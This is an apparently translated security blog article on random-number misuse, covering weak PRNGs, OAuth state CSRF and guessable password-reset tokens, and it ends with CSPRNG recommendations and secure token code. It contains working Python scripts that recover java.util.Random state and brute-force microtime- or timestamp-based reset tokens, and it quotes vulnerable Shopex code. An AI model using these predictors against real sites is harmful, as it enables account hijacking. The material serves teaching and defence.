A Chat About Random Number Security

Source: Internet
Author: User
Tags: .NET, OAuth, random, seed, CSRF, attack

0x00 Preface

While chatting with friends I noticed an interesting phenomenon: in the campus interviews of the last two years, most candidates had little or no basic knowledge of cryptography, even some who already had a penetration-testing foundation.

So here I want to talk about some simple cryptography basics: not the implementation of the algorithms, but rather how they connect to common vulnerability scenarios, so that the problems are easier to understand and a bit more interesting.

This article mainly discusses random numbers. Random numbers are used very widely and can be considered a foundation of cryptographic technology.

Improper use of random numbers can lead to fairly serious security issues, and these issues are usually subtle.

0x01 Random Numbers

Overview

Random numbers are widely used in computing, and the most familiar application is cryptography. This article mainly explains some of the web security risks caused by the misuse of random numbers.

Let's start with a quick look at random numbers.



Classification

Random numbers are divided into true random numbers and pseudo-random numbers. What our programs use is basically pseudo-random numbers, which in turn are divided into strong pseudo-random numbers and weak pseudo-random numbers.

    1. True random numbers: obtained from physical processes, such as coin tosses, dice, roulette wheels, electronic component noise, radioactive decay, etc.

    2. Pseudo-random numbers: produced by an algorithm from a seed. Anything implemented purely in software is pseudo-random.

      1. Strong pseudo-random numbers: random numbers that are unpredictable (cryptographically secure)

      2. Weak pseudo-random numbers: random numbers that are easy to predict

Characteristics

Random numbers have three properties:

    1. Randomness: no statistical bias; the sequence looks completely disordered.

    2. Unpredictability: the next number cannot be inferred from the numbers seen so far.

    3. Non-reproducibility: the same sequence cannot be reproduced unless the sequence itself was saved.

These properties map onto the classification above: a weak pseudo-random number only needs to satisfy randomness; a strong pseudo-random number needs randomness and unpredictability; a true random number needs all three at once.

The property that matters for security is unpredictability.

Generation of pseudo-random numbers

The random numbers in common software and applications are pseudo-random, so the focus of this article is pseudo-random numbers.

A pseudo-random number generator is usually implemented as algorithm + seed.

Typical pseudo-random number generator (PRNG) constructions are:

    1. Linear congruential generator (LCG)

    2. One-way hash function method

    3. Cipher-based method

    4. ANSI X9.17

The most common is the linear congruential method: the rand() of many C runtime libraries and Java's java.util.Random both use a linear congruential generator. An LCG's next state is a fixed linear function of its current state, which is exactly why its output can be predicted once part of the state is observed.
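To make the predictability concrete, here is an added example (written for this page, not code from the original article) that re-implements java.util.Random's 48-bit LCG in Python and recovers its hidden state from two observed nextInt() outputs. The multiplier, increment and seed scrambling are Java's own constants; the seed value used in the demo is an arbitrary, constructed one. Outputs are kept as unsigned 32-bit integers; Java's nextInt() is the signed interpretation of the same bits.

```python
"""Recover java.util.Random's 48-bit state from two consecutive nextInt() outputs.

java.util.Random is a linear congruential generator:
    state' = (state * 0x5DEECE66D + 0xB) mod 2**48
    nextInt() returns the top 32 bits of state'
Only 16 bits of the state are hidden from each output, so an attacker who
sees two outputs can brute-force those 16 bits and then predict every
future value. This is why a weak PRNG must never back a security token.
"""

MULT = 0x5DEECE66D
ADD = 0xB
MASK = (1 << 48) - 1


class JavaRandom:
    """Minimal re-implementation of java.util.Random (unsigned 32-bit outputs)."""

    def __init__(self, seed: int) -> None:
        # Java scrambles the caller-supplied seed before use.
        self.state = (seed ^ MULT) & MASK

    def next_int(self) -> int:
        self.state = (self.state * MULT + ADD) & MASK
        # Java's nextInt() is the signed interpretation of these same 32 bits.
        return self.state >> 16


def recover_state(out1: int, out2: int):
    """Given two consecutive next_int() outputs, return the generator state
    right after out2 was produced, or None if no candidate matches."""
    for low in range(1 << 16):
        # The state that produced out1 has out1 as its top 32 bits;
        # only the low 16 bits are unknown.
        cand = (out1 << 16) | low
        nxt = (cand * MULT + ADD) & MASK
        if nxt >> 16 == out2:
            return nxt
    return None


def predict_next(out1: int, out2: int, count: int = 1):
    """Predict the next `count` outputs that follow out1, out2."""
    state = recover_state(out1, out2)
    if state is None:
        raise ValueError("outputs are not consecutive java.util.Random values")
    clone = JavaRandom.__new__(JavaRandom)
    clone.state = state
    return [clone.next_int() for _ in range(count)]


if __name__ == "__main__":
    # Constructed scenario: a server hands out two "random" values,
    # the attacker predicts the next three.
    victim = JavaRandom(seed=123456789)
    seen = [victim.next_int() for _ in range(2)]
    predicted = predict_next(*seen, count=3)
    actual = [victim.next_int() for _ in range(3)]
    print("observed :", seen)
    print("predicted:", predicted)
    print("actual   :", actual)
    assert predicted == actual
```

The 65,536-iteration search takes well under a second; the same idea extends to nextLong() and to nextInt(bound), which only expose fewer bits per call and therefore need a few more observations.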

Application Scenarios

Random numbers are used everywhere; the following are common scenarios:

    • Verification code generation

    • Lotteries and prize draws

    • UUID generation

    • Session ID generation

    • Token generation

      • CSRF token

      • Password-retrieval token

    • Games (generation of random elements)

      • Shuffling cards

      • The sequence of pieces in Tetris

      • Item drops

    • Cryptographic scenarios

      • Generating keys: symmetric ciphers, message authentication codes

      • Generating key pairs: public-key encryption, digital signatures

      • Generating IVs: CBC, CFB and OFB modes of block ciphers

      • Generating nonces: defending against replay attacks; CTR mode of block ciphers

      • Generating salts: password-based encryption (PBE), etc.

0x02 The Security of Random Numbers

Compared with other cryptographic techniques, random numbers rarely get attention, yet they are extremely important in cryptography and in computing generally, and misusing them leads to a whole range of security issues.

Security risks of random numbers

Broadly, random-number problems fall into two categories:

    1. A random number should be used, but the developer does not use one;

    2. A strong pseudo-random number should be used, but the developer uses a weak one.

In the first case, simply put, the business logic needs a random number, but instead of generating one the developer supplies a constant. Many people will scoff that nobody could be that stupid, but please don't dismiss it: there are still plenty of such cases. There are two main reasons:

Developers lack basic knowledge and do not know that a random number is required;

Some scenarios and frameworks have poor interface documentation, or developers do not read it carefully.

For example, a password-retrieval token needs a (strong) pseudo-random number, yet a lot of business code derives the token directly from the user name.

For example, OAuth 2.0 requires the third-party client to pass a state parameter that acts as a CSRF token. Many developers do not use this parameter at all, or pass in a fixed value. The value is opaque to the authorization server, which has no way to validate it; it can only be checked at the business level by the client application, and when the client fails to do so, OAuth CSRF follows.

In the second case the issue is the strength of the pseudo-random number. The random-number functions in the standard libraries of most (all?) languages are weak pseudo-random generators, and many developers naturally use them directly. The most important and most fatal point: weak pseudo-random numbers must not be used in cryptographic technology.

Take the password-retrieval scenario from the first case again. For token generation, a lot of code uses a timestamp as the "random number" (md5(timestamp), md5(timestamp + username)); because the timestamp is predictable, the token is easy to guess. Unpredictability is the key criterion separating weak pseudo-random numbers from strong ones.

Besides these two cases there are some more special ones, usually rare but not to be ruled out:

    1. Seed leakage: algorithms are usually public, so if the seed leaks, the random numbers are effectively leaked;

    2. The random number pool is too small: strictly speaking this is also a weak pseudo-random number, because a small pool of possible values makes the output predictable and the attacker can simply brute-force it.

Vulnerability instances

There are many vulnerability reports of this kind on WooYun, and they are quite interesting; all of them revolve around random numbers.

PS: my own ability is limited; the examples below basically come from WooYun vulnerability reports. Thanks to the original researchers; if there is any infringement, please contact me for removal.

1. A random number should have been used but was not

OAuth 2.0: this problem is a classic; besides the WooYun examples listed here, many vendors actually have it.

The state parameter in OAuth 2.0 requires the third-party app developer to pass in a CSRF token (a random number). If it is omitted, or a non-random value is passed, CSRF can be used to log the victim into any account:

    1. Only product account-related vulnerability: any account can be logged into via CSRF

    2. Renren-Baidu OAuth 2.0 redirect_uri CSRF vulnerability

2. Using weak pseudo-random numbers

1) Password retrieval

In many password-retrieval flows, the user is emailed a URL containing a token; if that token can be guessed, another user's password can be reset.

1. Shopex 4.8.5: new-password generation vulnerability in password retrieval

The time function microtime() is used directly as the random number, and the first 6 characters of its MD5 are taken:

```php
// Shopex 4.8.5 (vulnerable pattern as reported): the "random" token is the
// first 6 hex characters of md5() over the text returned by microtime()
$token = substr(md5(print_r(microtime(), true)), 0, 6);
```

In PHP, microtime() returns a string made up of the microsecond fraction and the current server second, e.g. "0.12345600 1420070400"; the fraction only varies between 0.000000 and 0.999999. The server's second can usually be read from the Date header of the HTTP response, so only these 1,000,000 candidate values need to be enumerated. Brute-forcing them still means up to 1,000,000 network requests, which is a lot of traffic, but Shopex is very considerate: right before the password is generated it outputs microtime() once more, so the attacker only has to search the short interval after the leaked value:

```php
$messenger = &$this->system->loadmodel('System/messenger');
echo microtime() . "";   // leaks the server's microtime() to the requester just before the token is generated
```

2. Qihoo 360: arbitrary user password modification

The token is simply md5(unix timestamp).

3. Graffiti Kingdom: weak random number leads to arbitrary user hijacking, with test PoC

On the problem of password-retrieval random numbers, I strongly recommend the 2011 article "Using system time to predict and crack Java random numbers" by 空虚浪子心.
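The following added example (written for this page; it is not code from Shopex, Qihoo 360 or the WooYun reports) simulates the attacks against the two patterns above. It reproduces the text form of PHP's microtime() in Python, enumerates all 10^6 microsecond values of a known second, narrows the search to the window after a leaked microtime() as in the Shopex case, and handles the md5(unix timestamp) case by trying the seconds around the Date header. All timestamps are constructed, and the attacker's network requests are replaced by a local comparison against the token.

```python
"""Brute-force password-reset tokens derived from PHP's microtime() or time().

Vulnerable pattern 1 (Shopex-style):
    $token = substr(md5(print_r(microtime(), true)), 0, 6);
PHP's microtime() returns "0.MMMMMM00 SSSSSSSSSS": the microsecond fraction
(six significant digits padded to eight) followed by the Unix second.

Vulnerable pattern 2 (as described for Qihoo 360):
    $token = md5(time());
"""
import hashlib


def php_microtime_string(sec: int, usec: int) -> str:
    """Reproduce the text form of PHP's microtime() for a given instant."""
    return f"0.{usec:06d}00 {sec}"


def vulnerable_microtime_token(sec: int, usec: int) -> str:
    """Pattern 1: first 6 hex chars of md5(microtime())."""
    return hashlib.md5(php_microtime_string(sec, usec).encode()).hexdigest()[:6]


def vulnerable_timestamp_token(sec: int) -> str:
    """Pattern 2: md5 of the Unix second."""
    return hashlib.md5(str(sec).encode()).hexdigest()


def crack_microtime_token(token: str, sec_candidates):
    """Enumerate every microsecond of each candidate second (10**6 per second).
    Returns the first (sec, usec) producing the token; because the token is
    only 24 bits, a different instant with the same prefix works just as well."""
    for sec in sec_candidates:
        for usec in range(1_000_000):
            if vulnerable_microtime_token(sec, usec) == token:
                return sec, usec
    return None


def crack_with_leaked_microtime(token: str, leaked: str, window_usec: int = 5000):
    """Shopex case: the page printed microtime() just before generating the
    token, so the real instant lies a short time after the leaked value."""
    frac, sec = leaked.split()
    sec = int(sec)
    usec = int(round(float(frac) * 1_000_000))
    for _ in range(window_usec):
        if vulnerable_microtime_token(sec, usec) == token:
            return sec, usec
        usec += 1
        if usec == 1_000_000:          # roll over into the next second
            sec, usec = sec + 1, 0
    return None


def crack_timestamp_token(token: str, date_header_sec: int, window: int = 60):
    """md5(time()) case: try the seconds around the HTTP Date header."""
    for sec in range(date_header_sec - window, date_header_sec + window + 1):
        if vulnerable_timestamp_token(sec) == token:
            return sec
    return None


if __name__ == "__main__":
    # Constructed instant; in a real attack `sec` comes from the Date header.
    sec, usec = 1420070400, 312345
    token = vulnerable_microtime_token(sec, usec)
    print("token", token, "cracked at", crack_microtime_token(token, [sec]))

    leaked = php_microtime_string(sec, usec)              # what the page echoed
    later = vulnerable_microtime_token(sec, usec + 37)    # generated 37 us later
    print("leaked", leaked, "-> cracked at", crack_with_leaked_microtime(later, leaked))

    ts_token = vulnerable_timestamp_token(sec + 3)
    print("md5(time()) cracked at", crack_timestamp_token(ts_token, sec))
```

The full-second search is about a million MD5 calls, which finishes in a second or two offline; only the final guess has to be sent to the server. With the leaked microtime() the search shrinks to a handful of candidates.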

2) Other random-number verification scenarios

    • CmsEasy latest version: brute-force injection (encryption defect / anti-injection bypass)

      A weak pseudo-random number is bypassed.

    • ESPCMS v5.6: brute-force injection

      Exploiting a SQL injection in ESPCMS showed that the injected value is encrypted with a random key, but the key comes from a weak pseudo-random number with a fixed, small pool, so the attacker can enumerate it and bypass the protection.

    • Destoon 2014-05-21 latest version: bypass of the global defense, brute-force injection (reproducible on the official demo)

      microtime() is used as the random number and can be predicted by brute force.

    • Android SecureRandom vulnerability (detailed analysis)

      The SecureRandom implementation of Apache Harmony 6.0M3 and earlier, used by the Java Cryptography Architecture (JCA) on Android before 4.4, has a vulnerability in classlib/modules/security/src/main/java/common/org/apache/harmony/security/provider/crypto/SHA1PRNG_SecureRandomImpl.java: in the engineNextBytes method, when the caller does not supply a seed, the offset is not adjusted correctly, so the random sequence the PRNG generates can be predicted.

Security recommendations

The random-number basics and vulnerability instances above mostly give attackers ideas; here are some suggestions for defense and prevention.

    1. Where the business scenario requires a random number, a random number must be used, e.g. for token generation;

    2. Random numbers must be long enough to resist brute force;

    3. Random numbers for different purposes must use different seeds (or at least separate generator instances);

    4. Weak pseudo-random numbers are forbidden wherever security matters (such as cryptographic uses):

      1. Do not use time functions as random numbers (many programmers like timestamps): Java System.currentTimeMillis(), PHP microtime();

      2. Do not use weak pseudo-random number generators: Java java.util.Random; PHP rand(), whose range is tiny (getrandmax() is 32767 on Windows); PHP mt_rand(), whose implementation was flawed before PHP 7.1 and whose output is predictable in any version.

    5. Use a cryptographically secure pseudo-random number generator (CSPRNG). Common platforms:

      Platform                              CSPRNG
      PHP                                   mcrypt_create_iv(), openssl_random_pseudo_bytes(); PHP 7+: random_bytes()
      Java                                  java.security.SecureRandom
      .NET (C#, VB)                         System.Security.Cryptography.RNGCryptoServiceProvider (newer .NET: RandomNumberGenerator)
      Ruby                                  SecureRandom
      Python                                os.urandom(); Python 3.6+: the secrets module
      Perl                                  Math::Random::Secure
      C/C++ (Windows API)                   CryptGenRandom
      Any language on GNU/Linux or Unix     read from /dev/urandom (or /dev/random)

    6. Strong pseudo-random number generation (implementing your own is not recommended)

Two factors matter for generating high-strength random numbers: the seed and the algorithm. There are many algorithms to choose from; how the seed is chosen is usually the critical factor. java.util.Random, for example, was seeded from System.currentTimeMillis() in older JDKs (newer ones mix in System.nanoTime()), so its output is predictable and it is a weak pseudo-random number. Note that a better seed would not rescue it: its LCG reveals most of its state in every output.

The approach for strong pseudo-random number generation is to collect machine information such as keyboard input timing, memory usage, free disk space, I/O latency, process and thread counts and the CPU clock to obtain an approximately random seed; the goal is unpredictability. In practice, leave this to the operating system and use the platform CSPRNG listed above.
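Putting recommendations 1, 2 and 5 into practice, here is an added example (written for this page, not code from the original article or from any of the products discussed) that covers both vulnerable scenarios from 0x02: a password-retrieval token and an OAuth 2.0 state value, both drawn from Python's secrets module (which reads os.urandom). The reset token is stored only as a hash and compared in constant time; the state value is bound to the session and consumed on first use. The session is modelled as a plain dict, an assumption standing in for whatever session store the application uses.

```python
"""Generating and checking security tokens with a CSPRNG.

- Password-retrieval token: 256 random bits, stored only as a hash so that a
  database leak does not expose live tokens, verified in constant time.
- OAuth 2.0 state: per-session, single-use, compared in constant time, so a
  callback forged by an attacker (missing or fixed state) is rejected.
"""
import hashlib
import hmac
import secrets

TOKEN_BYTES = 32  # 256 bits: far beyond brute-force range (recommendation 2)


def new_reset_token():
    """Return (token_for_the_email_link, sha256_hex_for_the_database)."""
    token = secrets.token_urlsafe(TOKEN_BYTES)
    return token, hashlib.sha256(token.encode()).hexdigest()


def verify_reset_token(presented: str, stored_hash: str) -> bool:
    """Hash what the user presented and compare in constant time, so that
    timing does not reveal how many characters matched."""
    digest = hashlib.sha256(presented.encode()).hexdigest()
    return hmac.compare_digest(digest, stored_hash)


def oauth_begin(session: dict) -> str:
    """Issue a fresh state value for the authorization request and remember
    it in the user's session (assumed here to be a dict)."""
    state = secrets.token_urlsafe(TOKEN_BYTES)
    session["oauth_state"] = state
    return state


def oauth_callback(session: dict, returned_state) -> bool:
    """Accept the callback only if `state` matches what this session issued.
    The stored value is removed first, so a state can be used only once."""
    expected = session.pop("oauth_state", None)
    if expected is None or returned_state is None:
        return False  # no state issued, or the client omitted it
    return hmac.compare_digest(expected, returned_state)


if __name__ == "__main__":
    token, stored = new_reset_token()
    print("emailed token:", token)
    print("stored hash  :", stored)
    print("valid?", verify_reset_token(token, stored))

    session = {}
    state = oauth_begin(session)
    print("redirect to provider with state =", state)
    # Constructed attack: a cross-site request carrying a fixed state value.
    print("forged callback accepted?", oauth_callback(dict(session), "1234"))
    print("genuine callback accepted?", oauth_callback(session, state))
    print("replayed callback accepted?", oauth_callback(session, state))
```

Nothing here depends on the clock, the user name, or a small value pool, which is exactly what the WooYun cases above lacked; the same two helpers can back CSRF tokens and session IDs as well.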
